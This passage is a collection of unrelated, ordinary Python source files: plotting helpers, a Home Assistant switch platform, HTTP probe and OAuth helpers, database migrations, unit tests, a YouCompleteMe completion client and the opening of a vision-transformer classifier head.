        Step alignment: "left" (default), "mid" or "right".
    ax : matplotlib axes, optional
        Axes to draw on; defaults to the current axes.
    **kwargs will be passed to the matplotlib fill_between() function.
    """
    from matplotlib import pyplot as plt

    # If no Axes object given, grab the current one:
    if ax is None:
        ax = plt.gca()
    # First, duplicate the x values (each step needs two x samples)
    xx = x.repeat(2)[1:]
    # Now: the average x binwidth
    xstep = (x[1:] - x[:-1]).mean()
    # Now: add one step at end of row.
    xx = np.append(xx, xx.max() + xstep)
    # Make it possible to change step alignment.
    if h_align == "mid":
        xx -= xstep / 2.0
    elif h_align == "right":
        xx -= xstep
    # Also, duplicate each y coordinate in both arrays
    y1 = y1.repeat(2)
    if isinstance(y2, np.ndarray):
        y2 = y2.repeat(2)
    # now to the plotting part:
    ax.fill_between(xx, y1, y2=y2, **kwargs)
    return ax
|
import math
import matplotlib.pyplot as plt
from utils.colors import create_background
from tree.dynamics import recursive_branch
# Canvas dimensions (height, width, RGB channels) and dark-grey background.
image_size = (1200, 1920, 3)
image = create_background(image_size, '3f3f3f')
# Draw the recursive tree starting at (500, 1200), pointing straight up
# (angle pi/2), with an initial branch length of 150.
# NOTE(review): semantics of the third argument (1) are taken from the call
# site only - confirm against tree.dynamics.recursive_branch.
recursive_branch(image, 150, 1, math.pi/2, (500, 1200))
# Preview the result, then persist it to disk.
plt.imshow(image)
plt.show()
plt.imsave("wallpaper.png", image)
|
from typing import Any
from scriptable.antlr.TypescriptParser import TypescriptParser
from scriptable.api import AST
from scriptable.api.ast_binding import ASTBinding
class Property(AST[Any]):
    """AST node that resolves an identifier against the binding's
    properties, optionally failing hard on unknown names."""

    def __init__(self, value: str, strict: bool = False):
        self.value = value
        self.strict = strict

    def execute(self, binding: ASTBinding) -> Any:
        """Return the bound value for this name; unknown names either raise
        (strict mode) or evaluate to the raw name itself."""
        properties = binding.properties
        if self.value in properties:
            return properties[self.value]
        if self.strict:
            raise ValueError(f"no property with name {self.value} found")
        return self.value

    @staticmethod
    def parse(ctx: TypescriptParser.SPropertyContext, strict: bool = False) -> 'Property':
        """Build a Property from the parser context's raw text."""
        return Property(ctx.getText(), strict)

    def __repr__(self):
        return self.value
|
"""Support for NHC2 switches."""
import logging
from homeassistant.components.switch import SwitchEntity
from .helpers import nhc2_entity_processor
from nhc2_coco import CoCo, CoCoSwitch
from .const import DOMAIN, KEY_GATEWAY, BRAND, SWITCH
# Re-export the shared gateway key from .const and define the hass.data
# bucket used to track entities created by this platform.
KEY_GATEWAY = KEY_GATEWAY
KEY_ENTITY = 'nhc2_switches'
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Load NHC2 switches based on a config entry.

    Registers an empty entity bucket for this entry, then asks the CoCo
    gateway for its switches; each discovered CoCoSwitch is wrapped in an
    NHC2HassSwitch and added to Home Assistant via the processor helper.
    """
    hass.data.setdefault(KEY_ENTITY, {})[config_entry.entry_id] = []
    gateway: CoCo = hass.data[KEY_GATEWAY][config_entry.entry_id]
    _LOGGER.debug('Platform is starting')
    gateway.get_switches(
        nhc2_entity_processor(hass,
                              config_entry,
                              async_add_entities,
                              KEY_ENTITY,
                              lambda x: NHC2HassSwitch(x))
    )
class NHC2HassSwitch(SwitchEntity):
    """Home Assistant switch backed by an NHC2 CoCoSwitch (push-based)."""

    def __init__(self, nhc2switch: CoCoSwitch, optimistic=True):
        """Wrap the CoCo switch and subscribe to its change events."""
        self._device = nhc2switch
        self._optimistic = optimistic
        self._state = nhc2switch.is_on
        nhc2switch.on_change = self._on_change

    def _on_change(self):
        # Mirror the device's state and push it to Home Assistant.
        self._state = self._device.is_on
        self.schedule_update_ha_state()

    def turn_off(self, **kwargs) -> None:
        """Pass - not in use."""
        pass

    def turn_on(self, **kwargs) -> None:
        """Pass - not in use."""
        pass

    async def async_turn_on(self, **kwargs):
        """Instruct the switch to turn on."""
        self._device.turn_on()
        if not self._optimistic:
            return
        # Optimistic mode: reflect the new state before the device confirms.
        self._state = True
        self.schedule_update_ha_state()

    async def async_turn_off(self, **kwargs):
        """Instruct the switch to turn off."""
        self._device.turn_off()
        if not self._optimistic:
            return
        self._state = False
        self.schedule_update_ha_state()

    def nhc2_update(self, nhc2switch: CoCoSwitch):
        """Update the NHC2 switch with a new object."""
        self._device = nhc2switch
        nhc2switch.on_change = self._on_change
        self.schedule_update_ha_state()

    @property
    def unique_id(self):
        """Return the switch UUID."""
        return self._device.uuid

    @property
    def uuid(self):
        """Return the switch UUID."""
        return self._device.uuid

    @property
    def should_poll(self):
        """Return false, since the device pushes its state."""
        return False

    @property
    def name(self):
        """Return the switch name."""
        return self._device.name

    @property
    def available(self):
        """Return true if the device is online."""
        return self._device.online

    @property
    def is_on(self):
        """Return true if the switch is on."""
        return self._state

    @property
    def device_info(self):
        """Return the device registry info."""
        return {
            'identifiers': {(DOMAIN, self.unique_id)},
            'name': self.name,
            'manufacturer': BRAND,
            'model': SWITCH,
            'via_hub': (DOMAIN, self._device.profile_creation_id),
        }
|
import base64
import json
import time
from json import JSONDecodeError
from typing import Dict, Optional
import requests
from django.conf import settings
from kallisticore import exceptions
from kallisticore.lib.credential import Credential, TokenCredential, \
UsernamePasswordCredential
__all__ = ["http_probe", "http_request", "wait"]
def wait(time_in_seconds: int):
    """Block for *time_in_seconds* seconds.

    :raises FailedAction: when the argument is not exactly an int
        (the check is on the exact type, so bool is rejected too).
    """
    if type(time_in_seconds) is int:
        time.sleep(time_in_seconds)
        return
    raise exceptions.FailedAction(
        "Expected integer for argument 'time_in_seconds' "
        "(got %s)" % type(time_in_seconds).__name__)
def http_request(url: str, method: str = "GET",
                 request_body: Optional[Dict] = None,
                 headers: Optional[Dict] = None,
                 authentication: Optional[Dict] = None) -> Dict:
    """Perform an HTTP request and return a result dict.

    The result holds status code, raw body, headers, elapsed seconds and
    (when the body parses as JSON) a 'response' key.

    :raises InvalidHttpRequestMethod: for verbs other than
        GET/DELETE/POST/PATCH/PUT.
    """
    headers = extract_authentication_headers(authentication, headers)
    verb = method.upper()
    if verb in ("POST", "PATCH", "PUT"):
        # Body-carrying verbs: the payload is serialized as JSON.
        response = requests.request(verb, url=url,
                                    data=json.dumps(request_body),
                                    headers=headers)
    elif verb in ("GET", "DELETE"):
        response = requests.request(verb, url=url, headers=headers)
    else:
        raise exceptions.InvalidHttpRequestMethod(
            "Invalid method: {}. Please specify a valid HTTP request "
            "method".format(verb))
    result = {'status_code': response.status_code,
              'response_text': response.text,
              'response_headers': response.headers,
              'response_time_in_seconds': response.elapsed.total_seconds()}
    return _append_parsed_json_response(result)
def http_probe(url: str, method: str = "GET",
               request_body: Optional[Dict] = None,
               headers: Optional[Dict] = None,
               authentication: Optional[Dict] = None) -> Dict:
    """Probe *url* and fail unless it answers with a non-error status.

    Only GET and POST are supported; any status code >= 400 raises
    FailedAction with the timing and response details.
    """
    headers = extract_authentication_headers(authentication, headers)
    verb = method.upper()
    if verb == "GET":
        response = requests.get(url=url, headers=headers)
    elif verb == "POST":
        response = requests.post(url=url, data=json.dumps(request_body),
                                 headers=headers)
    else:
        raise exceptions.InvalidHttpProbeMethod(
            "Invalid method: {}. "
            "HTTP Probe allows only GET and POST methods".format(verb))
    elapsed = response.elapsed.total_seconds()
    if response.status_code >= 400:
        raise exceptions.FailedAction(
            "Http probe failed after {} seconds for url {} with status code {}. "
            "Details: {}".format(elapsed, url, response.status_code,
                                 response.text))
    return _append_parsed_json_response(
        {'status_code': response.status_code,
         'response_text': response.text,
         'response_headers': response.headers,
         'response_time_in_seconds': elapsed})
def _append_parsed_json_response(result: dict) -> Dict:
try:
result['response'] = json.loads(result['response_text'])
return result
except (ValueError, KeyError, JSONDecodeError):
return result
def _get_oauth_token_for_http_request_auth_header(config: Dict) -> str:
    """Fetch an OAuth token per *config* and format it as a Bearer header.

    TokenCredential: the stored token is used directly.
    UsernamePasswordCredential: a password-grant request is posted to
    config['url'] with HTTP Basic client authentication.

    :raises FailedAction: when the token endpoint answers with >= 400.
    :raises InvalidCredentialType: for any other credential class.
    """
    # Key of the token in the endpoint's JSON response; overridable.
    response_token_key = 'access_token'
    if 'token_key' in config:
        response_token_key = config['token_key']
    cred_class_map = getattr(settings, 'KALLISTI_CREDENTIAL_CLASS_MAP', {})
    credential = Credential.build(cred_class_map, config['credentials'])
    credential.fetch()
    if isinstance(credential, TokenCredential):
        return _format_oauth_token(credential.token)
    if isinstance(credential, UsernamePasswordCredential):
        # OAuth2 resource-owner password grant.
        request_body = {
            'grant_type': 'password',
            'username': credential.username,
            'password': credential.password
        }
        if 'resource' in config:
            request_body['resource'] = config['resource']
        # Client credentials go in a Basic auth header; secret may be empty.
        client_secret = config['client']['secret'] \
            if 'secret' in config['client'] else ''
        client_base64 = base64.b64encode('{}:{}'.format(
            config['client']['id'], client_secret).encode()).decode('utf-8')
        headers = {'Authorization': 'Basic {}'.format(client_base64)}
        response = requests.post(config['url'], request_body, headers=headers)
        if response.status_code >= 400:
            raise exceptions.FailedAction(
                "Authentication for http request failed with status code {}. "
                "Details: {}".format(response.status_code, response.text))
        response_body = response.json()
        return _format_oauth_token(response_body[response_token_key])
    raise exceptions.InvalidCredentialType(credential.__class__.__name__)
def _format_oauth_token(token: str) -> str:
auth_token_prefix = 'Bearer'
return '{} {}'.format(auth_token_prefix, token)
def extract_authentication_headers(authentication, headers):
    """Merge an OAuth2 Authorization header into *headers* when requested.

    Returns *headers* untouched when no authentication config is given
    or its type is not 'oauth2_token'.
    """
    if not authentication:
        return headers
    if authentication['type'] != 'oauth2_token':
        return headers
    token = _get_oauth_token_for_http_request_auth_header(authentication)
    if headers:
        headers['Authorization'] = token
    else:
        headers = {'Authorization': token}
    return headers
|
#!/usr/bin/env python
#
# Copyright (c) 2017-2019 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
from cloudify import ctx
from cloudify.exceptions import RecoverableError
def check_for_docker():
    """Return True when the Docker daemon answers `docker ps`.

    Returns False when the docker binary is missing (OSError from Popen)
    or the command exits non-zero.
    """
    command = 'docker ps'
    try:
        # Capture stdout/stderr so they can be logged below. Without
        # PIPE, communicate() returns (None, None) and the command's
        # output leaks straight to the worker's console.
        process = subprocess.Popen(
            command.split(),
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        )
    except OSError:
        # docker is not installed / not on PATH.
        return False
    output, error = process.communicate()
    ctx.logger.debug('command: {0} '.format(command))
    ctx.logger.debug('output: {0} '.format(output))
    ctx.logger.debug('error: {0} '.format(error))
    ctx.logger.debug('process.returncode: {0} '.format(process.returncode))
    if process.returncode:
        ctx.logger.error('Running `{0}` returns error.'.format(command))
        return False
    return True
if __name__ == '__main__':
    # Run as a Cloudify script task: RecoverableError makes the framework
    # retry until the Docker daemon responds.
    if not check_for_docker():
        raise RecoverableError('Waiting for docker to be installed.')
|
#!/usr/bin/python
# This script runs quill3d many times for various parameters
# (a 2-parameter scan driver; NOTE: Python 2 syntax — `print` statements).
import os
import datetime as dt
import rmtlib
import numpy as np  # used below for the parameter value arrays
config = '.laser-piston'
# parameter 0: electron density in units of the critical density
rmtlib.p0_name = 'ne'
#p0_value = rmtlib.geometric_progression(7e22,3e23,2)
p0_value = np.array([431])
rmtlib.p0_unit = 'ncr'
# parameter 1: laser amplitude a0 (dimensionless)
rmtlib.p1_name = 'a0'
#p1_value = rmtlib.geometric_progression(400,2500,4)
p1_value = np.array([2800])
#p1_value = np.linspace(200,400,3)
rmtlib.p1_unit = ''
# see list of pp_operations in rmtlib.py
rmtlib.pp_operation = ['density','spectrum','i:x-ux','energy','i:x-y-ux','i:spectrum','mollweide'] # post-processing operations
rmtlib.cwd = os.getcwd() # current directory
# single timestamp tags the whole scan's post-processing output
t = dt.datetime.now()
print rmtlib.p0_name+', '+rmtlib.p0_unit+',',p0_value
print rmtlib.p1_name+', '+rmtlib.p1_unit+',',p1_value
print rmtlib.pp_operation
os.chdir('../')
# expand the config template into a plain 'conf' file consumed by quill
os.system('./parse.sh '+config+' > conf')
# scan over the cartesian product of the two parameter value arrays
for p0 in p0_value:
    for p1 in p1_value:
        rmtlib.prepare_conf(p0,p1,config)
        print rmtlib.p0_name+' = '+str(p0)+' '+rmtlib.p0_unit
        print rmtlib.p1_name+' = '+str(p1)+' '+rmtlib.p1_unit
        # NOTE(review): wipes previous results before each run — confirm intended
        os.system('rm results/*')
        os.system('cat conf | ./quill')
        rmtlib.ppo(p0,p1,config,t.strftime('%y-%m-%d--%H-%M-%S'))
|
"""
disk_item.py
Copyright 2012 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
class DiskItem(object):
    """Base class for objects that are stored in a DiskList or DiskSet."""

    __slots__ = ()

    def get_eq_attrs(self):
        """
        Subclasses must return the attribute names that make an instance
        "unique" — usually every attribute whose data can't be derived
        from the others. DiskList hashes the corresponding values to an
        md5 which is saved to the DB, indexed, and used for a fast(er)
        __contains__ implementation.

        :return: A list of attribute names.
        """
        raise NotImplementedError
|
class Solution:
    def findShortestSubArray(self, nums: "List[int]") -> int:
        """Return the length of the shortest subarray with the degree of nums.

        The degree is the maximum frequency of any element; the answer is
        the shortest contiguous window that still contains that many
        copies of some element (LeetCode 697). O(n) time and space.

        Note: the annotation is quoted because this snippet has no
        `from typing import List`; an unquoted `List[int]` would raise
        NameError when the class body is evaluated.
        """
        if not nums:
            return 0
        # value -> (first index, last index, occurrence count)
        spans = {}
        degree = 0
        for index, num in enumerate(nums):
            if num in spans:
                first, _, count = spans[num]
                spans[num] = (first, index, count + 1)
                degree = max(degree, count + 1)
            else:
                spans[num] = (index, index, 1)
                degree = max(degree, 1)
        # Shortest window among the values that reach the degree.
        return min(last - first + 1
                   for first, last, count in spans.values()
                   if count == degree)
|
from sagas.nlu.translator import translate
from sagas.tool import init_logger
import logging
logger = logging.getLogger(__name__)
class GoogleTranslator(object):
    """Fire CLI wrapper around sagas.nlu.translator.translate."""

    def translate(self, text, target='zh-CN', source='auto', verbose=False):
        """
        Translate *text* from *source* to *target* and print the result.

        $ python -m sagas.nlu.translator_cli translate 'Садись, где хочешь.'
        $ python -m sagas.nlu.translator_cli translate 'Садись, где хочешь.' en
        $ python -m sagas.nlu.translator_cli translate 'Садись, где хочешь.' en ru
        # multi-sentences
        $ python -m sagas.nlu.translator_cli translate 'Что в этом конверте? Письмо и фотографии.' ja auto True
        $ python -m sagas.nlu.translator_cli translate 'Что в этом конверте? Письмо и фотографии.' en auto True
        $ python -m sagas.nlu.translator_cli translate 'I am a student.' ar en True
        $ python -m sagas.nlu.translator_cli translate 'I have two refrigerators' th en True
        $ python -m sagas.nlu.translator_cli translate 'I have two refrigerators' iw en True
        $ python -m sagas.nlu.translator_cli translate '次の信号を右に曲がってください。' zh ja True
        # word translations
        $ python -m sagas.nlu.translator_cli translate 'city' ar en True
        $ python -m sagas.nlu.translator_cli translate 'tiger' lo en True
        $ python -m sagas.nlu.translator_cli translate 'गतिविधि' en hi True
        $ python -m sagas.nlu.translator_cli translate 'fly' en no True
        :param text: text to translate
        :param target: target language code (default 'zh-CN')
        :param source: source language code, 'auto' to detect
        :param verbose: forwarded as trans_verbose to the translator
        :return: None (the translation is printed)
        """
        res,_ = translate(text, source=source, target=target,
                          trans_verbose=verbose,
                          # options={'disable_correct'},
                          options={'disable_correct', 'disable_cache'}
                          )
        print(res)
    # print(translate('Садись, где хочешь.'))
    # print(translate('I am a student.'))
    def trans_en(self, text, target='zh-CN'):
        """
        Translate English *text* into *target* with debug logging enabled.

        $ python -m sagas.nlu.translator_cli trans_en 'I have two refrigerators' es
        $ python -m sagas.nlu.translator_cli trans_en 'I have two refrigerators' he
        :param text: English text to translate
        :param target: target language code
        :return: None (the translation is printed)
        """
        import sagas
        # NOTE(review): relies on sagas.nlu.google_translator being reachable
        # as an attribute after `import sagas` — confirm the package imports
        # its submodules eagerly.
        sagas.nlu.google_translator.logger.setLevel(logging.DEBUG)
        res, _ = translate(text, source='en', target=target,
                           trans_verbose=True,
                           options={'disable_correct'}
                           )
        print(res)
if __name__ == '__main__':
    import fire
    # Expose the class methods as CLI subcommands via python-fire.
    fire.Fire(GoogleTranslator)
|
# Copyright (C) 2013-2019 YouCompleteMe contributors
#
# This file is part of YouCompleteMe.
#
# YouCompleteMe is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# YouCompleteMe is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with YouCompleteMe. If not, see <http://www.gnu.org/licenses/>.
import json
import logging
from ycmd.utils import ToUnicode
from ycm.client.base_request import ( BaseRequest, DisplayServerException,
MakeServerException )
from ycm import vimsupport
from ycm.vimsupport import NO_COMPLETIONS
_logger = logging.getLogger( __name__ )
class CompletionRequest( BaseRequest ):
  """Asynchronous completion request to ycmd.

  Start() posts the request; Response() collects and converts the result
  into Vim complete-items; OnCompleteDone() applies post-completion
  actions (C# namespace insertion, or generic fixits).
  """

  def __init__( self, request_data ):
    super( CompletionRequest, self ).__init__()
    self.request_data = request_data
    self._response_future = None

  def Start( self ):
    # Fire-and-forget: the result is fetched later through the future.
    self._response_future = self.PostDataToHandlerAsync( self.request_data,
                                                         'completions' )

  def Done( self ):
    # True once the server has answered (or the request failed).
    return bool( self._response_future ) and self._response_future.done()

  def _RawResponse( self ):
    # Raw ycmd payload, or NO_COMPLETIONS if nothing is pending/returned.
    if not self._response_future:
      return NO_COMPLETIONS
    response = self.HandleFuture( self._response_future,
                                  truncate_message = True )
    if not response:
      return NO_COMPLETIONS
    # Vim may not be able to convert the 'errors' entry to its internal format
    # so we remove it from the response.
    errors = response.pop( 'errors', [] )
    for e in errors:
      exception = MakeServerException( e )
      _logger.error( exception )
      DisplayServerException( exception, truncate_message = True )
    # Record where the completions were requested, for the caller.
    response[ 'line' ] = self.request_data[ 'line_num' ]
    response[ 'column' ] = self.request_data[ 'column_num' ]
    return response

  def Response( self ):
    # Same as the raw response, but with the completion entries converted
    # to Vim's complete-item dictionaries.
    response = self._RawResponse()
    response[ 'completions' ] = _ConvertCompletionDatasToVimDatas(
        response[ 'completions' ] )
    return response

  def OnCompleteDone( self ):
    # Invoked from Vim's CompleteDone handling.
    if not self.Done():
      return
    if 'cs' in vimsupport.CurrentFiletypes():
      self._OnCompleteDone_Csharp()
    else:
      self._OnCompleteDone_FixIt()

  def _GetExtraDataUserMayHaveCompleted( self ):
    # Returns a list of extra_data dicts for the item(s) the user may
    # have just completed.
    completed_item = vimsupport.GetVariableValue( 'v:completed_item' )
    # If Vim supports user_data (8.0.1493 or later), we actually know the
    # _exact_ element that was selected, having put its extra_data in the
    # user_data field. Otherwise, we have to guess by matching the values in the
    # completed item and the list of completions. Sometimes this returns
    # multiple possibilities, which is essentially unresolvable.
    if 'user_data' not in completed_item:
      completions = self._RawResponse()[ 'completions' ]
      return _FilterToMatchingCompletions( completed_item, completions )
    if completed_item[ 'user_data' ]:
      return [ json.loads( completed_item[ 'user_data' ] ) ]
    return []

  def _OnCompleteDone_Csharp( self ):
    # Insert the namespace import required by the completed C# symbol,
    # prompting the user when several candidates matched.
    extra_datas = self._GetExtraDataUserMayHaveCompleted()
    namespaces = [ _GetRequiredNamespaceImport( c ) for c in extra_datas ]
    namespaces = [ n for n in namespaces if n ]
    if not namespaces:
      return
    if len( namespaces ) > 1:
      choices = [ "{0} {1}".format( i + 1, n )
                  for i, n in enumerate( namespaces ) ]
      choice = vimsupport.PresentDialog( "Insert which namespace:", choices )
      if choice < 0:
        return
      namespace = namespaces[ choice ]
    else:
      namespace = namespaces[ 0 ]
    vimsupport.InsertNamespace( namespace )

  def _OnCompleteDone_FixIt( self ):
    extra_datas = self._GetExtraDataUserMayHaveCompleted()
    fixit_completions = [ _GetFixItCompletion( c ) for c in extra_datas ]
    fixit_completions = [ f for f in fixit_completions if f ]
    if not fixit_completions:
      return
    # If we have user_data in completions (8.0.1493 or later), then we would
    # only ever return max. 1 completion here. However, if we had to guess, it
    # is possible that we matched multiple completion items (e.g. for overloads,
    # or similar classes in multiple packages). In any case, rather than
    # prompting the user and disturbing her workflow, we just apply the first
    # one. This might be wrong, but the solution is to use a (very) new version
    # of Vim which supports user_data on completion items
    fixit_completion = fixit_completions[ 0 ]
    for fixit in fixit_completion:
      vimsupport.ReplaceChunks( fixit[ 'chunks' ], silent=True )
def _GetRequiredNamespaceImport( extra_data ):
return extra_data.get( 'required_namespace_import' )
def _GetFixItCompletion( extra_data ):
return extra_data.get( 'fixits' )
def _FilterToMatchingCompletions( completed_item, completions ):
"""Filter to completions matching the item Vim said was completed"""
match_keys = [ 'word', 'abbr', 'menu', 'info' ]
matched_completions = []
for completion in completions:
item = _ConvertCompletionDataToVimData( completion )
def matcher( key ):
return ( ToUnicode( completed_item.get( key, "" ) ) ==
ToUnicode( item.get( key, "" ) ) )
if all( matcher( i ) for i in match_keys ):
matched_completions.append( completion.get( 'extra_data', {} ) )
return matched_completions
def _GetCompletionInfoField( completion_data ):
info = completion_data.get( 'detailed_info', '' )
if 'extra_data' in completion_data:
docstring = completion_data[ 'extra_data' ].get( 'doc_string', '' )
if docstring:
if info:
info += '\n' + docstring
else:
info = docstring
# This field may contain null characters e.g. \x00 in Python docstrings. Vim
# cannot evaluate such characters so they are removed.
return info.replace( '\x00', '' )
def _ConvertCompletionDataToVimData( completion_data ):
  # See :h complete-items for a description of the dictionary fields.
  extra_menu_info = completion_data.get( 'extra_menu_info', '' )
  preview_info = _GetCompletionInfoField( completion_data )
  # When we are using a popup for the preview_info, it needs to fit on the
  # screen alongside the extra_menu_info. Heuristic: if the extra_menu_info
  # is wider than about 1/3 of the screen, truncate it and move the full
  # text into the preview_info instead.
  if vimsupport.UsingPreviewPopup():
    max_width = max( int( vimsupport.DisplayWidth() / 3 ), 3 )
    if vimsupport.DisplayWidthOfString( extra_menu_info ) > max_width:
      if not preview_info.startswith( extra_menu_info ):
        preview_info = extra_menu_info + '\n\n' + preview_info
      extra_menu_info = extra_menu_info[ : max_width - 3 ] + '...'
  vim_item = {
    'word' : completion_data[ 'insertion_text' ],
    'abbr' : completion_data.get( 'menu_text', '' ),
    'menu' : extra_menu_info,
    'info' : preview_info,
    'kind' : ToUnicode( completion_data.get( 'kind', '' ) )[ :1 ].lower(),
    # Disable Vim filtering.
    'equal' : 1,
    'dup'   : 1,
    'empty' : 1,
    # We store the completion item extra_data as a string in the completion
    # user_data. This allows us to identify the _exact_ item that was completed
    # in the CompleteDone handler, by inspecting this item from v:completed_item
    #
    # We convert to string because completion user data items must be strings.
    #
    # Note: Not all versions of Vim support this (added in 8.0.1483), but adding
    # the item to the dictionary is harmless in earlier Vims.
    # Note: Since 8.2.0084 we don't need to use json.dumps() here.
    'user_data': json.dumps( completion_data.get( 'extra_data', {} ) )
  }
  return vim_item
def _ConvertCompletionDatasToVimDatas( response_data ):
return [ _ConvertCompletionDataToVimData( x ) for x in response_data ]
|
# Generated by Django 1.10.7 on 2017-08-26 07:32
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds letter.message_id_field, storing the outbound email's
    # "Message-ID" header value.

    dependencies = [("letters", "0007_letter_is_spam")]
    operations = [
        migrations.AddField(
            model_name="letter",
            name="message_id_field",
            field=models.CharField(
                blank=True,
                max_length=500,
                verbose_name='ID of sent email message "Message-ID"',
            ),
        )
    ]
|
import socket
import logging
import unittest
from kuyruk import Kuyruk
from kuyruk import Worker
logger = logging.getLogger(__name__)
class Args:
    """Minimal stand-in for the worker's parsed CLI arguments."""

    def __init__(self, **kwargs):
        # Defaults mirror the attributes the worker expects to find.
        self.queues = []
        self.logging_level = None
        self.max_load = None
        self.max_run_time = None
        # Any keyword argument overrides (or extends) the defaults.
        for name, value in kwargs.items():
            setattr(self, name, value)
class WorkerTestCase(unittest.TestCase):
    """Behaviour of Worker queue-name resolution."""

    def test_default_queue(self):
        """Consume from "kuyruk" if no queue is given"""
        worker = Worker(Kuyruk(), Args())
        self.assertListEqual(worker.queues, ['kuyruk'])

    def test_queue_names(self):
        """Hostname is appended to local queues"""
        worker = Worker(Kuyruk(), Args(queues=['foo', 'bar.localhost']))
        expected = ['foo', 'bar.%s' % socket.gethostname()]
        self.assertListEqual(worker.queues, expected)
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Add a unique constraint on portforwarding rule
Revision ID: efcfc170aca4
Revises: efcfc169aca4
Create Date: 2014-04-27 18:35:28.148680
"""
# Alembic revision identifiers.
revision = 'efcfc170aca4'
down_revision = 'efcfc169aca4'
# Run for every plugin.
migration_for_plugins = [
    '*'
]
from alembic import op
from sqlalchemy import exc
from neutron.db import migration
TABLE_NAME = 'portforwardingrules'
# Unique-constraint names (columns are encoded in the name).
UC_NAME_1 = 'uniq_pf_rule_10router_id0protocol0outside_port'
UC_NAME_2 = 'uniq_pf_rule_20router_id0protocol0inside_addr0inside_port'
def upgrade(active_plugins=None, options=None):
    """Create the two unique constraints; drop the old 'outside_port' one.

    OperationalError 1061 (appears to be MySQL's "duplicate key name")
    is swallowed so the migration is re-runnable when UC_NAME_1 already
    exists — TODO confirm the errno assumption for other backends.
    """
    if not migration.should_run(active_plugins, migration_for_plugins):
        return
    try:
        op.create_unique_constraint(
            name=UC_NAME_1,
            source=TABLE_NAME,
            local_cols=['router_id',
                        'protocol',
                        'outside_port', ]
        )
    except exc.OperationalError as e:
        # Constraint already present: ignore; anything else is re-raised.
        if 1061 == e.orig.args[0]:
            pass
        else:
            raise
    op.create_unique_constraint(
        name=UC_NAME_2,
        source=TABLE_NAME,
        local_cols=['router_id',
                    'protocol',
                    'inside_addr',
                    'inside_port', ]
    )
    try:
        # The pre-migration constraint; may already be gone.
        op.drop_constraint(
            name='outside_port',
            table_name=TABLE_NAME,
            type_='unique'
        )
    except exc.OperationalError:
        pass
def downgrade(active_plugins=None, options=None):
    """Drop the two unique constraints added by upgrade().

    UC_NAME_1's drop is best-effort (its creation may have been skipped
    when a same-named constraint already existed).
    """
    if not migration.should_run(active_plugins, migration_for_plugins):
        return
    op.drop_constraint(
        name=UC_NAME_2,
        table_name=TABLE_NAME,
        type_='unique'
    )
    try:
        op.drop_constraint(
            name=UC_NAME_1,
            table_name=TABLE_NAME,
            type_='unique'
        )
    except exc.OperationalError:
        pass
|
def find_noisy():
    """Placeholder: detect noisy channels. Not yet implemented."""
    pass


def find_bad_segments():
    """Placeholder: detect bad data segments. Not yet implemented."""
    pass


def find_bad_components():
    """Placeholder: detect bad components. Not yet implemented."""
    pass


def find_blinks():
    """Placeholder: detect blink artifacts. Not yet implemented."""
    pass
|
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import build_activation_layer
from mmcv.runner import BaseModule, Sequential
from ..utils import accuracy, accuracy_mixup, lecun_normal_init
from ..registry import HEADS
from ..builder import build_loss
@HEADS.register_module
class VisionTransformerClsHead(BaseModule):
    """Vision Transformer classifier head: one fc layer, optionally
    preceded by a `pre_logits` linear + activation block.

    *** Mixup and multi-label classification are supported ***

    Args:
        num_classes (int): Number of categories.
        in_channels (int): Number of channels of the input cls token.
        hidden_dim (int | None): If set, insert a `pre_logits` linear
            layer of this width (plus activation) before the final head.
        act_cfg (dict): Activation config for the pre_logits layer.
        loss (dict): Config of classification loss.
        multi_label (bool): Whether to use one_hot like labels (requiring the
            multi-label classification loss). Notice that we support the
            single-label cls task to use the multi-label cls loss.
        frozen (bool): Whether to freeze the parameters.
        init_cfg (dict): Weight initialization config.
    """
    def __init__(self,
                 num_classes=1000,
                 in_channels=384,
                 hidden_dim=None,
                 act_cfg=dict(type='Tanh'),
                 loss=dict(type='CrossEntropyLoss', loss_weight=1.0),
                 multi_label=False,
                 frozen=False,
                 init_cfg=dict(type='TruncNormal', layer='Linear', std=.02),
                 **kwargs):
        super(VisionTransformerClsHead, self).__init__(init_cfg)
        self.in_channels = in_channels
        self.num_classes = num_classes
        self.hidden_dim = hidden_dim
        self.act_cfg = act_cfg
        self.multi_label = multi_label
        self._init_layers()
        # loss: fall back to plain CE when no loss config is given
        # (multi_label requires an explicit loss config).
        if loss is not None:
            assert isinstance(loss, dict)
            self.criterion = build_loss(loss)
        else:
            assert multi_label == False
            loss = dict(type='CrossEntropyLoss', loss_weight=1.0)
            self.criterion = build_loss(loss)
        if frozen:
            self.frozen()
    def _init_layers(self):
